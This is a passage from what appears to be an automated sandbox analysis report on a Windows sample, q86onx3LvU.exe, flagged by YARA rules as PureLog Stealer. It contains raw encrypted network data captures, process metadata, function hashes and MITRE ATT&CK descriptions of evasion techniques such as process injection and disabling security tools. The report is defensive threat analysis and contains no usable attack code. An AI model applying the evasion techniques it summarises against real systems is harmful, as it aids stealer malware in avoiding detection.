59 fc 35 f4 8c d9 92 8b be be 54 6b 5e fb Data Ascii: W(DZ}51uR(>hH-W}2+=-plx`c?B_#:}'#K1Me949T}B1Uj@}d#u[UbY!`wfFeOs{"BEBIpC)X!DVI6;m~GHY5Tk^
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: e0 ed 4e be 9a 1b 0b 76 be 94 5c b6 71 70 26 6c 2d ef 46 b2 ef e5 c8 83 6c 10 b5 07 ba 19 ff e6 eb f7 c9 e6 25 33 31 75 4b 05 19 f6 5e 67 0a 01 09 da f6 7e 31 92 f4 d9 6d eb 5e 88 4b 58 3e 13 e9 e1 1f be 7d 17 89 97 38 46 4e bc 79 cf db e1 6e e0 38 27 a7 4c f9 71 b5 c1 fe 25 8c 57 7f 38 bb 97 a7 66 7f 60 e9 fa a2 30 a4 5b 39 0c 63 95 cc 8e 5d 59 b5 da 63 c5 20 35 40 d6 13 17 c2 4b 08 43 35 c1 28 f8 79 de 97 9b 6b d3 53 0f 65 36 5f 3d 2d 08 e2 67 e5 a3 02 a8 1e a2 a4 a2 0f 06 2d 00 17 d6 b3 49 53 c8 2e 44 18 58 c3 d0 5d 83 f3 cc f8 29 d6 18 e1 e6 b9 44 5a 1e c1 7c 5c 80 62 88 50 b5 ab 2a 95 b4 05 5a 56 c2 87 16 ad 2e 05 90 4c c9 2c a5 35 67 2b 94 2f 92 3f da 93 08 7b 52 83 55 3d 82 97 87 46 d4 9c 5e d1 3c 01 b3 8c 64 af 42 ce 85 d5 4a 7d af 26 62 54 b6 21 Data Ascii: Nv\qp&l-Fl%31uK^g~1m^KX>}8FNyn8'Lq%W8f`0[9c]Yc 5@KC5(ykSe6_=-g-IS.DX])DZ\|\bP*ZV.L,5g+/?{RU=F^<dBJ}&bT!
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: b1 5f 0e 46 31 69 17 76 3c 2a 8d fc 71 15 d7 79 8f aa 86 28 98 76 ca ed 4b d4 9e 7b 0d 7b 13 f4 00 8a 99 ea ce a6 c5 9a 0d f0 91 d0 f5 7c b0 49 65 ed 9e 19 43 39 4f 07 e8 3c ba 8c 7d 6c 24 65 4e 77 a8 62 86 e4 d4 76 05 2e f9 ba fc b8 3b 53 08 ed 7d 09 0d d1 35 fc ef 9c 58 9a ed f1 0f fa 50 22 28 5c 86 ee 66 dd 47 ee 60 23 8a c4 0c b5 7b ab f9 8d 57 6e 7d d1 e5 7e f2 45 0d 0f 2a b4 d6 bf d4 85 ed f6 18 04 e1 ae 25 65 c1 5f bc 51 85 10 3f 6e ac a6 70 80 24 82 3a 3e e7 ab 78 7b 1c bf f6 b7 e3 6d b5 23 33 ab ac 83 66 3d cc fc d5 40 ed ff 73 0d e5 f4 7a 6d f3 3f 56 6b 04 e8 13 c3 ba 8c 90 20 9a ae d4 7b ad 17 71 fb b1 c0 97 7a 48 15 3d 5a 68 93 ec ac e5 4e 51 a8 2f 12 75 f9 66 16 f7 37 17 14 db 9d 3f 81 3f c0 01 ef fe 09 df 55 1c 74 26 01 30 8f 2f b0 98 41 94 Data Ascii: _F1iv<qy(vK{{\|IeC9O<}l$eNwbv.;S}5XP"(\fG`#{Wn}~E%e_Q?np$:>x{m#3f=@szm?Vk {qzH=ZhNQ/uf7??Ut&0/A
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: b2 75 0b 90 98 c0 b0 5d d1 c8 72 bf 88 0e b5 90 5f df 4d 4e 77 6b cc 78 27 33 2f eb 4e 92 c0 ad 82 ee e4 4d 38 e0 ac fa 57 b8 22 3e 12 3e 50 1c 45 33 51 b9 b6 2c 79 c9 0c b1 45 4b c4 66 9f 83 0d 4b ae ae 53 7d 7b af 78 79 d3 71 89 2b c4 74 5f ce 7a 0e 32 a9 2c 1a 6c 43 0d 18 37 02 a7 4f eb 17 f6 28 fe 56 c6 f9 37 6f 4b 81 82 d7 3b ab ad d4 2c fc 74 ba 70 f8 85 ec 23 1a b4 23 17 13 9a a8 2f b9 8c 21 9f 87 f8 e9 12 ca 91 df e0 c4 d3 65 02 16 f1 4b 4d 4d 1b 20 ae 10 18 eb 39 50 91 a1 4a db da 79 ae 69 16 3b 82 63 41 65 74 6e 7f a5 35 44 ee 5c dd 79 98 ce 91 f3 08 c0 cb 67 a8 fa 47 6c 26 78 c5 cc b4 ab 9d e9 61 fd 6b 81 39 77 e7 18 dd e0 a0 94 88 e0 0b 29 2f 4c 60 88 fc d8 fe 12 e4 b6 32 b7 01 71 bf e8 45 f4 e9 5b cb 9d d7 0b 35 8e a8 2c e6 da 7d 4a 6f 39 b8 Data Ascii: u]r_MNwkx'3/NM8W">>PE3Q,yEKfKS}{xyq+t_z2,lC7O(V7oK;,tp##/!eKMM 9PJyi;cAetn5D\ygGl&xak9w)/L`2qE[5,}Jo9
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: 6e 24 5b 9d 96 ab a9 03 79 04 cd f6 1f d6 1c d9 d2 cd de 84 ac d6 01 d7 ca cc 39 2d 57 2c a2 3a 05 ad 26 d2 2c a5 a8 aa 1e 63 bd cc f6 f9 f6 6a 50 93 35 78 4b 49 79 0a a4 a0 b8 69 d2 33 7a 34 2c a5 9c 70 b2 7f ce d0 28 ed 67 98 fe 8e b6 ee c3 7f d0 9d c1 a1 ac 7d f6 28 44 95 da 48 fa d6 05 90 4e 28 4a 80 a9 93 69 8b ed 3f af 7b 0d 5e 2b 98 6b 99 22 c8 00 04 0b e8 8c 3c 90 9d e1 08 15 5d 99 33 5e e8 27 bd ae 4d 17 80 15 73 86 53 ae ca 7b 22 51 7a d1 d4 47 ef 45 a2 2b 3f 5d 64 59 12 31 2e 19 47 70 11 15 87 b7 83 a4 ca f2 cf eb 5e b2 21 00 25 7f 53 41 94 e1 ef 06 ea 9b 70 59 fd a6 2e 25 a2 d3 4f dc f9 a1 f6 d4 6d db 84 73 90 c5 ff ef f5 5f 46 4f fb ee 8a 45 3a c2 11 09 7e 8f 26 28 09 85 f7 76 d3 fb 33 35 97 6a bf 42 c4 ec d6 07 92 c5 e8 3c 83 96 86 b9 99 d9 Data Ascii: n$[y9-W,:&,cjP5xKIyi3z4,p(g}(DHN(Ji?{^+k"<]3^'MsS{"QzGE+?]dY1.Gp^!%SApY.%Oms_FOE:~&(v35jB<
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: cb 90 d8 03 3f 41 de ef 02 1d 52 b7 92 63 80 9c 19 8b e4 2d c1 9c 88 b1 58 d6 44 bc ab b6 55 c3 55 7e 73 21 68 cf 29 51 bf 3d b3 88 68 1d 7e 31 d2 7c 60 b0 28 48 35 04 d8 70 7a 31 b2 65 27 62 0c 14 dd 16 0b c2 e0 e2 68 49 df 2b 9f 60 bf 4c 21 e8 32 a8 ea 52 3e 80 2f ed 0a 46 78 66 db 32 0d 8f e9 77 cc 9b 46 ca 6f d6 cb 73 11 0b 03 dd 7b 82 44 86 67 e5 81 74 89 6f 4e 9e 2f c2 00 74 7e ce f3 28 f1 17 a7 f1 3e 47 c4 fa 8c 96 18 ba b5 bd 6e 55 86 49 dd 30 17 32 95 96 f0 4d d1 1a bf 57 a9 ee a7 37 24 2f a7 22 60 28 03 94 63 74 85 40 11 ab ed 94 ea a3 6d fa 71 03 54 98 75 79 29 cd 40 e8 fd b4 26 1c 59 36 c2 dd 8c 87 5f a3 bc a2 20 52 77 98 6b 71 de d2 8a a2 a1 12 08 5b d0 a5 55 22 0f 42 72 1d 59 8f df ee 00 e8 7d 6c f3 12 0d c3 b9 c2 27 e6 84 60 0f 60 6d 69 c6 Data Ascii: ?ARc-XDUU~s!h)Q=h~1\|`(H5pz1e'bhI+`L!2R>/Fxf2wFos{DgtoN/t~(>GnUI02MW7$/"`(ct@mqTuy)@&Y6_ Rwkq[U"BrY}l'``mi
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: 63 c4 88 55 1d 4a 3b b9 8b 2c 54 3e a9 6a 43 7f 47 39 ed 86 9a 31 04 d8 70 35 61 c1 5b 17 55 fc a8 27 a8 9a a7 66 4a 59 5d 9c f6 f1 0a a3 8f 09 5c 55 37 fa 89 45 97 4a 11 de bf c2 41 00 a3 5f 5c d3 2b dc 41 68 3b 17 34 ba fd f8 23 0a 4d 17 13 7b 5c 45 6d 49 af ef 2f 20 03 ad 56 82 71 25 72 b5 83 bc 79 7d ee 13 dd 9f 96 aa cb 67 73 b3 31 f2 a2 d0 4c 2e 32 14 3d 9c 6b 6c 3a 6a 00 e6 b5 a1 d6 56 75 c7 86 12 1b 6a 6e 58 1d e7 6a 4e c6 6a 6d cd c2 50 63 2a c2 6c 69 88 c7 ee 18 6f 09 6a de 25 31 51 b5 f1 b3 5a 3e 0d 48 31 ad 2a 20 af 20 9d 8e 86 d4 3d ce 96 f3 c8 0f 94 96 43 3b c7 dd 77 6b 2f 50 75 09 8d 4a 3b 3f 70 8d 3f 45 5c b4 1f 84 79 ca 4b a2 1b 77 19 3e ed 1d 28 44 62 68 73 05 69 85 85 45 20 f4 33 6c a1 6b 9c 72 9a ef ba ac ec 11 df e3 79 77 24 95 18 85 Data Ascii: cUJ;,T>jCG91p5a[U'fJY]\U7EJA_\+Ah;4#M{\EmI/ Vq%ry}gs1L.2=kl:jVujnXjNjmPclioj%1QZ>H1 =C;wk/PuJ;?p?E\yKw>(DbhsiE 3lkryw$
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: 63 85 ec 7b b2 93 3d 68 06 53 3b 7a b8 02 7c 04 04 b6 f9 3a fa 32 95 9d 4c ad 69 42 8d 58 ac 0f de a8 77 72 cd c0 80 c9 de a2 f7 67 87 6a a5 9c 83 af 2d 97 6a 5d bc 35 73 6a 85 3e 78 5d 27 6b af d2 5d 0d 1e 06 0b 30 12 da 3d e1 0d 58 2f ee 46 68 56 4c f9 2e a5 e5 2c 92 32 e8 11 d5 46 0e aa 45 6f 98 e5 25 47 a9 dd 7c 5d e3 79 53 1a ee 09 b0 3b c7 f8 ce 74 23 d0 bd 07 17 a6 dd 1d a2 88 7c 42 d0 8e 61 a8 41 d8 d7 45 c7 0a c3 6b dc 28 d2 e1 a2 48 95 9f 51 05 48 c8 ee 8f b1 f4 d4 44 6f ad 99 69 5d 3a 91 3d 2b dc 87 6d 55 00 ed 4a a5 ea af 24 c6 24 7f 99 89 69 91 35 0e 7a dc c5 fd 06 0a ab 2c 68 25 76 0a ec df b9 00 6a c6 11 04 06 5b 4f 98 6f 97 7e f1 13 d8 eb 1e 84 ad 2b e0 9d 12 02 8f e9 a1 d2 e2 e4 50 77 51 4c ce 96 17 c2 40 5a ee 3a fd 73 68 cb 9d 12 3f 03 Data Ascii: c{=hS;z\|:2LiBXwrgj-j]5sj>x]'k]0=X/FhVL.,2FEo%G\|]yS;t#\|BaAEk(HQHDoi]:=+mUJ$$i5z,h%vj[Oo~+PwQL@Z:sh?
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: 41 5b 87 e7 28 43 41 23 03 22 36 8b b0 0e 9b ce 11 1e 07 9c 53 f1 57 b6 f4 a3 5e a3 ab cf f4 90 a5 e0 f2 95 3d d7 95 d0 cb e0 75 ec 5d aa 28 ff 02 27 0e 12 c9 2a f7 7f b0 97 09 86 8a 34 ba ff 43 a9 66 9c 8d b8 c0 8a 15 c6 a2 10 e9 7e 4e df a3 87 6d b9 9a a0 d9 7c b9 91 95 5e 27 17 f2 c1 6b 82 35 9c 13 7c b5 45 97 61 97 e9 ef bf 4f 92 f5 9f 87 c3 7a 22 68 58 fd f3 f8 98 6a 39 5c f4 c2 0e 5c b4 98 c2 55 d6 58 27 9f 33 97 ed 15 2f 1b e0 51 36 02 78 9b b5 1e 9c 38 df 1a 13 8b 65 aa aa 0a e0 b4 90 d2 99 4f 6e 91 b0 d3 a4 9d a1 b2 ba 28 5d d7 e6 6c 5c 93 3c 09 12 96 62 3e c5 f5 f9 aa 4a ad a3 d0 35 fb 04 bd 09 54 99 63 b7 3e 95 0b ff 2d 5c 0b 63 27 a7 62 16 68 c6 6b ad 58 9d 38 b9 09 0e 26 c8 ac 2a 0a 27 69 6e 86 53 44 c6 89 8a ca f9 93 fa e3 54 93 d0 4e 79 c6 Data Ascii: A[(CA#"6SW^=u]('4Cf~Nm\|^'k5\|EaOz"hXj9\\UX'3/Q6x8eOn(]l\<b>J5Tc>-\c'bhkX8&'inSDTNy
2024-07-03 14:17:02 UTC	1369	IN	Data Raw: f6 9a e6 bc dc bc 23 87 2c ea e1 d8 b1 73 3d 71 dc d9 29 1e 96 a3 2a 10 55 82 e7 21 72 2e 54 e2 ad 51 88 b2 fb b7 d5 d3 d0 cd 0e f2 e4 20 77 fa 70 af a3 08 fc 27 cd e9 ba 95 f5 59 95 55 bd 31 d5 0e b1 68 32 64 d4 0a 89 c7 0f 3d 2a 89 f7 8c 1c ee 18 f0 75 e7 d7 ee 82 92 14 3e 13 2a 66 37 e0 7f d8 18 98 fa f4 73 6e f0 18 1e 37 c0 d5 fe 42 82 13 58 fe c9 2e 8c 6b 87 2d 37 6a 8d 15 88 db f8 0f a7 d6 5c fd 43 03 fa 09 8d ca bc fe d1 fe 5e cb f1 f1 66 a1 7e e6 cd f6 b2 64 b8 38 c6 fa c9 e3 d9 6d f5 db 29 87 f3 7b f7 42 ef 1b 1a c9 ee cd e6 c9 e5 58 bb 3a 3d 63 88 b8 49 87 26 36 b9 db ea ed 01 cb 61 b7 a5 8c 88 4a 77 4b 4d c7 22 9b e9 9e f0 b5 67 8b 46 24 0d 6d fc 71 80 de ca 05 d1 c0 ff 80 d5 8c a6 55 aa 90 7c 8a f9 2e 44 ef 14 b3 97 ce 14 25 8e 26 d0 5d e8 f4 Data Ascii: #,s=q)U!r.TQ wp'YU1h2d=u>*f7sn7BX.k-7j\C^f~d8m){BX:=cI&6aJwKM"gF$mqU\|.D%&]

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: q86onx3LvU.exePID: 6740, Parent PID: 2592

General

Target ID:	0
Start time:	10:17:01
Start date:	03/07/2024
Path:	C:\Users\user\Desktop\q86onx3LvU.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\q86onx3LvU.exe"
Imagebase:	0xda0000
File size:	6'656 bytes
MD5 hash:	3AA2339D295C90C1A0FBFAD98E9CEBD0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1449645106.0000000004F80000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000000.00000002.1449645106.0000000004D54000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Chronological Activities

Analysis Process: WerFault.exePID: 4388, Parent PID: 6740

General

Target ID:	10
Start time:	10:17:04
Start date:	03/07/2024
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6740 -s 2400
Imagebase:	0xb70000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: q86onx3LvU.exePID: 6740, Parent PID: 2592COMMON

Executed Functions

Function 03060A20 Relevance: 1.3, Strings: 1, Instructions: 73COMMON

Download Yara Rule

Strings

Telq, xrefs: 03060A54

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID: Telq
API String ID: 0-3313314595
Opcode ID: 879c4b9376ebf9744042bd9c0c49507791b5d13f900847ebfd41787deb610085
Instruction ID: 3c2918b0cc20cb69198b19956bfc52993d38256e49c0e6d62b19d9041c22fd2a
Opcode Fuzzy Hash: 879c4b9376ebf9744042bd9c0c49507791b5d13f900847ebfd41787deb610085
Instruction Fuzzy Hash: 1B21C330B9D111DFC755EB388C155BE7BB2AF85680B1488A9D00BDB359DA309C0A87C1

Function 030608E7 Relevance: 1.3, Strings: 1, Instructions: 72COMMON

Download Yara Rule

Strings

Telq, xrefs: 0306090E

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID: Telq
API String ID: 0-3313314595
Opcode ID: 716b7134a14e95a4ce496e4cc726574d1ebfcdb9800de7c32471d5f86dd4388c
Instruction ID: d6c68e5e2423e3c5d57076409ca30815b17de337250afae5980da4b53f2c5e6e
Opcode Fuzzy Hash: 716b7134a14e95a4ce496e4cc726574d1ebfcdb9800de7c32471d5f86dd4388c
Instruction Fuzzy Hash: 51212874789205CFE744DF69C498A6DBBE3BF88610F244869E406DB3A9CB709C41CB61

Function 03060A30 Relevance: 1.3, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

Telq, xrefs: 03060A54

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID: Telq
API String ID: 0-3313314595
Opcode ID: f9d6ace82fe15765624eeb5a9825cf41e18b15f6076a74df8d4fadfaa61ed565
Instruction ID: 3d64ac3905b194a090f7a14454b858e3f4e0fccae1ec5c0d4d6e9c0546265b32
Opcode Fuzzy Hash: f9d6ace82fe15765624eeb5a9825cf41e18b15f6076a74df8d4fadfaa61ed565
Instruction Fuzzy Hash: EC11B630B8E110DFCB44EB688C1457E76B2AFC5680B148C69D00BDB358EB719D0987C2

Function 03060AD5 Relevance: 1.3, Strings: 1, Instructions: 58COMMON

Download Yara Rule

Strings

Telq, xrefs: 03060A54

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID: Telq
API String ID: 0-3313314595
Opcode ID: 1f44508aabce10632be4cd00cf44a6a240cb8e3b04a8bf57b05e0f22f1a05f49
Instruction ID: abf830ef24fd252a3cca08792a7872c34fed4cf064a4ae345e4dc2171b7407f5
Opcode Fuzzy Hash: 1f44508aabce10632be4cd00cf44a6a240cb8e3b04a8bf57b05e0f22f1a05f49
Instruction Fuzzy Hash: 6111613579E010DBCA59E7288C1457E72A3ABC56C0B158C95D10B9B79DDF619C0E87C2

Function 030612ED Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35e203cfd42d90a95d62de9d7737efc084a28d3a0439e77256503265f9b1c60e
Instruction ID: 5b4288d92a1fc482d3ef6c05a25e8c0049dec4b5c5e5f5b40c3b2b39bd3c88f0
Opcode Fuzzy Hash: 35e203cfd42d90a95d62de9d7737efc084a28d3a0439e77256503265f9b1c60e
Instruction Fuzzy Hash: 3F417C70D053889FCB15CFA9D594AEEFFF1AF89300F15805AE849AB265CB345946CFA0

Function 03061308 Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d46cefd5867e39abface30f31bf12c244d46157687d84636a3088eada0bd185
Instruction ID: 9659c2963c5b311e5f67ca49c25d30e6c4ad42481f10da2e072d61aad5d42201
Opcode Fuzzy Hash: 1d46cefd5867e39abface30f31bf12c244d46157687d84636a3088eada0bd185
Instruction Fuzzy Hash: D4313A70D012589FCB14CFA9C584AEEFFF5AF48310F248019E909AB364DB749945CFA0

Function 02F8D76D Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1448717361.0000000002F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f8d000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d4e13f5ae3bb5b436ff003dcaace49e679274125254c57328f0794e2dec47f2
Instruction ID: ec77a517fddd88fa7c97c70db3cdbf8c730ed73168fd65d45567df72f442a53c
Opcode Fuzzy Hash: 5d4e13f5ae3bb5b436ff003dcaace49e679274125254c57328f0794e2dec47f2
Instruction Fuzzy Hash: C0012B7250530C9AD710AB35DD84B6BFFD8EF413A4F08C429EE094A1CAC3789840C671

Function 02F8D76C Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1448717361.0000000002F8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02F8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2f8d000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64d799cc94b96992510bc2c9aab6df97b35109ca51ec56bfda56e1d1a7e4f566
Instruction ID: e627fa5c9c902b3e6190c23cf3a51039ba7e5df566d585f624629f7ac292f7e8
Opcode Fuzzy Hash: 64d799cc94b96992510bc2c9aab6df97b35109ca51ec56bfda56e1d1a7e4f566
Instruction Fuzzy Hash: C8F0F671404348AEE7208F16DC88BA6FFA8EF41774F18C55AEE0C5B2C6C3789844CAB1

Function 03060818 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1dea55665f007195f8f09d434a3b3d8e20b58b4f694e6d5829fdd2641917514
Instruction ID: ec71da5fa571cf0bfccc4a23ffe7b5f6cf108198e5d594edefd21f9794b0e92b
Opcode Fuzzy Hash: f1dea55665f007195f8f09d434a3b3d8e20b58b4f694e6d5829fdd2641917514
Instruction Fuzzy Hash: CFF0152949E3E94FC3035B78A87A0E97F709C2325530A48E7D0C6CA1ABC5041C1BD7A5

Function 03060870 Relevance: .0, Instructions: 26COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 817153e9c48381ea6681b41de118f2836e0e2483ac255d4e68fdfde57e1555fd
Instruction ID: fbb3f5d9093a30ae97663beff42703b89142e15e82b7db66c5709db74c4549f2
Opcode Fuzzy Hash: 817153e9c48381ea6681b41de118f2836e0e2483ac255d4e68fdfde57e1555fd
Instruction Fuzzy Hash: 29F06D35398295CFC342DB7CE49889C3FE4FF4A26430504E6E086CB676C6619C02CB81

Function 030608B9 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da83e1deabf7370ab13fb26f9cb9d3b04e32136b67f5b9b449a2c5ec1c127fdb
Instruction ID: 2ff979742cc9abeb7f1c0ef6c158f9e82f3b242ba91b4b46bf707c05ec3dbf14
Opcode Fuzzy Hash: da83e1deabf7370ab13fb26f9cb9d3b04e32136b67f5b9b449a2c5ec1c127fdb
Instruction Fuzzy Hash: 95D0EB2080C04067C300A038C422B9F7FAECBC92E0F410070C846633A9D944490593D1

Function 030608C8 Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f3086ce99ae62e6f0e05da9c75df6456d9b49367c838a3a53ad5a7f5b8dfaa9d
Instruction ID: 82e7e2df554539f02ee1a622293c811ba10ad4d022cdeabf116ff8644fc87d2b
Opcode Fuzzy Hash: f3086ce99ae62e6f0e05da9c75df6456d9b49367c838a3a53ad5a7f5b8dfaa9d
Instruction Fuzzy Hash: 85D0A72090D14867C604A07EC814A5FB99E97C9A40F414524D50663358DD54694492E2

Function 03060848 Relevance: .0, Instructions: 10COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ff6ce9a4bac4875c397829d72eb7589bc4f3169b2f477aa0405f8d4979b54c6
Instruction ID: 2034cfaef71bba62e6bf00b67186ba2beb292112c3edf6eb170c238949ed2b5d
Opcode Fuzzy Hash: 2ff6ce9a4bac4875c397829d72eb7589bc4f3169b2f477aa0405f8d4979b54c6
Instruction Fuzzy Hash: BCC04C388D910DCFC344AB68F80C13DBBB8BE60B863011C27F14FC45259A201D728A90

Function 030609FC Relevance: .0, Instructions: 7COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1449075253.0000000003060000.00000040.00000800.00020000.00000000.sdmp, Offset: 03060000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3060000_q86onx3LvU.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 469dce9661142e73fb882d03f1414d4bb8e616b7ebb13078ebf0893120b45ac1
Instruction ID: b6ff2f9c802c659ad23d0959ae2f33478bfdbcccbc10a8db3e9230d9adccc25d
Opcode Fuzzy Hash: 469dce9661142e73fb882d03f1414d4bb8e616b7ebb13078ebf0893120b45ac1
Instruction Fuzzy Hash: 4BB01220A085110B0244F17C501062C84425DE5D403520658C106E3268DD490E062386

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
